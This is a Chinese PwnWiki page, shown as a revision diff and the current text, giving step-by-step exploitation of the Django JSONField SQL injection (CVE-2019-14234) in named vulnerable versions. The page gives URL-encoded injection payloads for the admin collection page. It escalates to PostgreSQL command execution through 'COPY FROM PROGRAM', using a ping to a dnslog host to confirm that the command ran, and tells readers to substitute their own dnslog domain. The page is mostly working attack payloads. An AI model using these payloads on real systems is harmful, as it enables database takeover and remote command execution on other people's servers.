Difference between revisions of "CVE-2019-14234 Django JSONField SQL注入漏洞/zh-cn"
From PwnWiki
(Created page with "命令成功执行。") |
(Created page with "访问:") |
||
| Line 35: | Line 35: | ||
回显<code>no results to fetch</code> 语句成功执行。 | 回显<code>no results to fetch</code> 语句成功执行。 | ||
| − | + | 访问: | |
| − | |||
| − | |||
<pre> | <pre> | ||
http://127.0.0.1/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_execs%20FROM%20PROGRAM%20%27ping%20test.dnslog.cn%20%27--%20 | http://127.0.0.1/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_execs%20FROM%20PROGRAM%20%27ping%20test.dnslog.cn%20%27--%20 | ||
Revision as of 16:01, 12 July 2021
影响版本
Django 2.2.x < 2.2.4 Django 2.1.x < 2.1.11 Django 1.11.x < 1.11.23
漏洞利用
首先需登录管理员后台,访问模型Collection的管理页面:
http://127.0.0.1/admin/vuln/collection/
http://127.0.0.1/admin/vuln/collection/?detail__a%27
http://127.0.0.1/admin/vuln/collection/?detail__a%27)%3D%271%27%20or%201%3d1%20--
Django一般与PostgreSQL一起配合使用,可以尝试利用PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)
访问以下URL:
http://127.0.0.1/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_execs(cmd_output%20text)--%20
回显no results to fetch 语句成功执行。
访问:
http://127.0.0.1/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_execs%20FROM%20PROGRAM%20%27ping%20test.dnslog.cn%20%27--%20
命令成功执行。
⚠️️
test.dnslog.cn請修改爲自己的Dnslog
